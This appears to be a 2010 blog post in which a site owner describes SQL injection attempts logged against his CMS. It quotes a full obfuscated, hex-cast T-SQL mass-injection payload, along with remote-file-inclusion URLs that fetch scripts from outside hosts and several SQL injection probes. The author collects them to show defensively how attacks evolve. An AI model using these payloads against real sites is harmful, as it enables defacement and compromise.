Friday, August 20, 2010

TSQL Injection Hack Attempts

I’ve been getting a lot of hack attempts on my CMS lately, mostly in the form of attempted SQL injection.
Most of the IP addresses track back to the Middle East, China, and former USSR states. I don’t know what it is about these places, but it’s almost always them.

The scary thing is seeing how hack attempts are contently developing and adapting.

They uses to be simple like
;or 1=1

Now we get stuff like the following
;DeClARE%20@S%20vARChaR(4000);SET%20@S=caST(0x4465636C617265204074205641726368417228323535292C404320764172634861722832353529204465436C615265207461424C455F637572734F5220635572734F5220464F522073456C45635420412E6E414D452C622E6E616D652046724F6D207359734F624A4543547320612C735973434F6C756D4E73206220776865724520412E69643D422E496420616E6420612E58745950453D27752720414E442028622E58547950653D3939206F7220422E78745970653D3335204F5220622E58747970653D323331204F5220422E78745970453D31363729204F70454E207441626C655F437552734F52204645546368206E4558542066726F4D205441626C655F435552734F7220694E546F2040542C4043205748694C4528404066655463685F5374615475533D302920424547496E20657845432827755064415465205B272B40742B275D20536554205B272B40632B275D3D725472696D28634F6E7665725428766172434841522834303030292C5B272B40632B275D29292B43417374283078334336393636373236313644363532303733373236333344323236383734373437303341324632 46364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520417320564152634841722831303629292729206645546368204E6558742066524F4D207461626C655F437572736F7220496E544F2040542C406320654E6420636C6F5365207461426C655F437552734F72206445616C6C4F63617465205461626C455F435552734F7220%20AS%20varchAR(4000));Exec(@s);--

Notice the case variations in an attempt to bypass checks for blacklisted words. And the TSQL Casting is just nightmarish.

Who writes this stuff?

More info avalible at : http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Update :
Here are a few more address line attacks that I'm getting;
?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/10/26/2620908/id.txt???
?id=1813'%20and%201=1%20and%20''=' (it's not even a log-in page, WTF)
?id=1813'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' 
?INCLUDE_FOLDER=http://lisia.pl/libraries/pear/archive_tar/ide1.txt????

No comments:

Post a Comment